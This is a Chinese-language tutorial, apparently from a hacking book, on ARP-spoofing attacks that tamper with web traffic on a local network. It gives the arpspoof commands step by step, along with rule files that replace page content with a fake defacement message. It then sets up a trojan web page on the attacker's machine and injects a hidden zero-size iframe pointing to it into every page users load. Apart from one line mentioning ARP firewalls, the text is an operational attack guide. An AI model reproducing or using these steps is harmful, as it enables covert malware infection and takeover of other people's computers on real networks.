ARP挂马攻击--嗅探欺骗的最恐怖方式
局域网内"交换型"网络环境中的嗅探攻击,利用的是ARP欺骗的原理,它是点对点地发生在3台主机(网关、欺骗主机与被欺骗主机)之间的。
然而在2007年初,以ARPSpoof工具为代表的新兴ARP欺骗技术发生了变化,直接针对网关进行欺骗,让通过网关访问网络的所有主机全被欺骗攻击,以造成网站被入侵的假象,或者直接访问到木马网页。
也就是说,一对一的攻击技术发展为一对多的攻击模式。而且,新兴的ARP欺骗技术,不仅可以在局域网中使用,还被广泛地应用在Internet网络中,攻击目标的范围更加广泛。
---------------------------------------------------------------------------------------------------------------------
ARPSpoof欺骗 公司网页被黑挂马
ARPSpoof是一个ARP欺骗攻击工具,它的应用环境非常广泛。
首先,在普通的公司、企业或网吧等局域网中,无论是采用Hub集线器、路由器还是采用交换机组建的局域网都适用。其次,在光纤和宽带等Internet网络中,有许多用户采用静态分配IP地址的方式上网,即使用公共的网关IP地址,这类处于同一网段内的公网网络也会遭到攻击。
此外,在普通的Internet中也能应用ARP欺骗攻击。例如,攻击者要攻击腾讯网站,只需要入侵与腾讯网在同一网段的某台主机,然后运行ARPSpoof,就可以达到在腾讯网上挂马的目的。普通浏览网页的用户对此根本无能为力,只有依靠腾讯网站管理员在网关上安装ARP防火墙才可以防止此类攻击。
可见ARPSpoof的危害是如此的大。特别是攻击者在渗透入侵过程中,只要进入了内网,就可以利用ARPSpoof进行ARP欺骗挂马攻击,从而让内网中的所有用户都被木马攻击。
攻击只需一步,即可完成内网渗透中的横向权限提升攻击。
1.网站被黑的假象
为了说明ARPSpoof的攻击原理,这里利用ARPSpoof进行一次网站被黑的欺骗攻击的操作。攻击的效果是,在局域网中让所有用户访问内部网站服务器时,网页上显示被入侵攻击的信息。
1)查询网关与网站服务器的IP地址
在命令窗口中执行命令:
  1. ipconfig /all 
此命令是显示本机网络信息的。其中"Default Gateway"显示为"192.168.1.1",就是网关IP地址;本机IP地址为"192.168.1.8",如图8-39所示。
再执行命令:
  1. ping 网站网址 
即可知道要攻击的网站内网的IP地址,这里假设目标网站的IP地址为"192.168.1.8"。
2)生成欺骗规则
下载ARP欺骗工具"arpspoof 3.1b",打开命令窗口并进入程序所在的文件夹,执行如下命令(见图8-40):
  1. arpspoof.exe /n 
ARP挂马攻击--嗅探欺骗的最恐怖方式_网页挂马 
(点击查看大图)图8-39  获得网关服务器的IP地址
ARP挂马攻击--嗅探欺骗的最恐怖方式_ARP_02 
(点击查看大图)图8-40  导出欺骗规则
命令执行成功后,会在当前文件夹中生成一个名为"job.txt"的文件,此文件是用于定义欺骗规则的。用记事本打开"job.txt"文件,在文件中可以看到如下内容:
  1. ----  
  2. HTTP/1.  
  3. ----  
  4. HTTP/1.1 200 OK\r\nServer: CoolDiyer's Hack 
    IIS\r\nContent-Length: 27\r\nConnection:    
    close\r\nContent-Type: text/html\r\n\r\nHack
    by cooldiyer
    <noframes> 
  5. ---- 
"HTTP/1"表示嗅探到数据包中的数据,"HTTP/1.1 200 OK\r\nServer: CoolDiyer's Hack IIS\r\nContent-Length: 27\r\nConnection: close\r\nContent-Type: text/html\r\n\r\nHack by cooldiyer<noframes>"表示要替换成的字符。也就是说,嗅探到"HTTP/1."数据后,自动将其替换为后者的内容。替换后在网页中显示"Hack by cooldiyer"字符串,并且可以将"cooldiyer"替换为任意名称,如图8-41所示,修改后保存文件。
ARP挂马攻击--嗅探欺骗的最恐怖方式_挂马_03 
(点击查看大图)图8-41  修改的规则文件
该规则文件的书写格式为:
  1. ----  
  2. 原字符串  
  3. ----  
  4. 替换后的字符串  
  5. ---- 
可以用同样的格式书写多行替换字符。例如,修改成如下内容:
  1. ----  
  2. <hea 
  3. ----  
  4. Hack by 冰河洗剑<noframes> 
  5. ----  
  6. <HEA 
  7. ----  
  8. Hack by 冰河洗剑<noframes> 
  9. ---- 
该规则可将捕获到的网络数据包中的"<hea"或"<HEA",替换为"Hack by 冰河洗剑"的字样。如果用户对网页源代码编辑比较熟悉的话,就可以随心所欲地替换代码,以显示想要的效果。
3)欺骗攻击
在命令行下执行命令(见图8-42):
  1. arpspoof.exe /l 
将会显示当前的网络配置信息,包括网卡的数目,以及网关与本机的IP地址。本机有两块网卡,选择用于欺骗攻击的网卡为"1.Realtek RTL8139",因此网卡序号为0。如果只有一块网卡,则网卡的序号直接为0。由此,可执行如下命令(见图8-43):
  1. arpspoof.exe  192.168.1.1  192.168.1.8  80 1 1 /r job.txt 
ARP挂马攻击--嗅探欺骗的最恐怖方式_职场_04 
(点击查看大图)图8-42  显示当前的网络配置信息
ARP挂马攻击--嗅探欺骗的最恐怖方式_休闲_05 
(点击查看大图)图8-43  执行ARP欺骗
命令执行后即可开始嗅探欺骗攻击。当校园网内的计算机访问校园网站(192.168.1.8)时,都必须通过网关(192.168.1.1)转发数据,才能访问到校园网站。如果要终止ARP欺骗攻击,可以按【Ctrl+C】组合键,提示Reseting后,等待5秒钟,整个局域网即可恢复正常。
由于本机(192.168.1.198)正在进行ARP欺骗攻击,该欺骗代替了真正的校园网站,并且网关会将访问者计算机的数据转发到本机上。因此,在进行ARP欺骗攻击后,其他同学访问到的实际上是攻击者设置的数据--其他同学访问校园网站时,打开的网页不是真实的网页,而是被替换后的页面,如图8-44所示。
ARP挂马攻击--嗅探欺骗的最恐怖方式_ARP_06 
(点击查看大图)图8-44  被黑网页
2.内网挂马,ARP欺骗在渗透中的应用
攻击者除了制造网站服务器被黑的假象外,还可以制造真正的攻击--使访问该网页的所有主机都被木马程序攻击,让攻击者直接利用网页木马提升权限并控制内网中所有的主机。
1)制作网页木马
首先,攻击者需要制作一个网页木马,可以使用"微软Ani网页木马生成器",如图8-45所示。在上方输入本机的IP地址,这里是"http://192.168.1.198/";在下方输入木马程序链接地址,这里攻击者直接在本地建立一个网站,因此木马可以直接放在攻击主机上。
单击【生成网页木马】按钮,即可在软件当前目录下生成3个文件:"index.htm"、"z1.jpg"、"z2.jpg",如图8-46所示。在"C:\"目录下新建一个名称为"WEB"的文件夹,将这3个文件和木马程序都复制到"C:\WEB"文件夹中。
ARP挂马攻击--嗅探欺骗的最恐怖方式_网页挂马_07 
(点击查看大图)图8-45  微软Ani网页木马生成器
ARP挂马攻击--嗅探欺骗的最恐怖方式_休闲_08 
(点击查看大图)图8-46  生成的网页木马
2)建立木马的网页服务
运行"紫雨轩 ASP Web 服务器 v1.0.4.10",如图8-47所示,这是一个小型的Web服务器软件。
单击工具栏中的【参数设置】按钮,在弹出的"参数设置"对话框中设置"根目录"为"C:\web",将"缺省文件"设置为"index.htm",其他项保持默认,单击【OK】按钮,完成设置,如图8-48所示。
ARP挂马攻击--嗅探欺骗的最恐怖方式_挂马_09 
(点击查看大图)图8-47  紫雨轩 ASP Web 服务器
ARP挂马攻击--嗅探欺骗的最恐怖方式_休闲_10 
(点击查看大图)图8-48  "参数设置"对话框
在浏览器中输入本机的IP地址,按【Enter】键后即可打开木马网页,如图8-49所示。这是一个空白网页,但是杀毒软件会在打开网页时提示警告,说明网页木马成功建立。
ARP挂马攻击--嗅探欺骗的最恐怖方式_休闲_11 
(点击查看大图)图8-49  网页木马建立成功
3)建立挂马规则
修改前面生成的"job.txt"文件,修改后的内容如下:
  1. ----  
  2. </HTML> 
  3. ----  
  4. <iframe src=http://192.168.1.198/index.htm width=0 height=0></iframe></HTML> 
保存该文件后,同样用上面的方法进行ARP欺骗,在命令行下执行命令(见图8-50):
  1. arpspoof.exe  192.168.1.8  192.168.1.1  80 0 0 /r job.txt 
ARP挂马攻击--嗅探欺骗的最恐怖方式_网页挂马_12 
(点击查看大图)图8-50  ARP欺骗挂马攻击
执行该命令后,即使有人访问该网站服务器,也不会显示任何异常,打开的仍然是正常的网站网页,但网页木马已经嵌入其中了。而且访问网站服务器上的任何一个网页文件都会中木马病毒。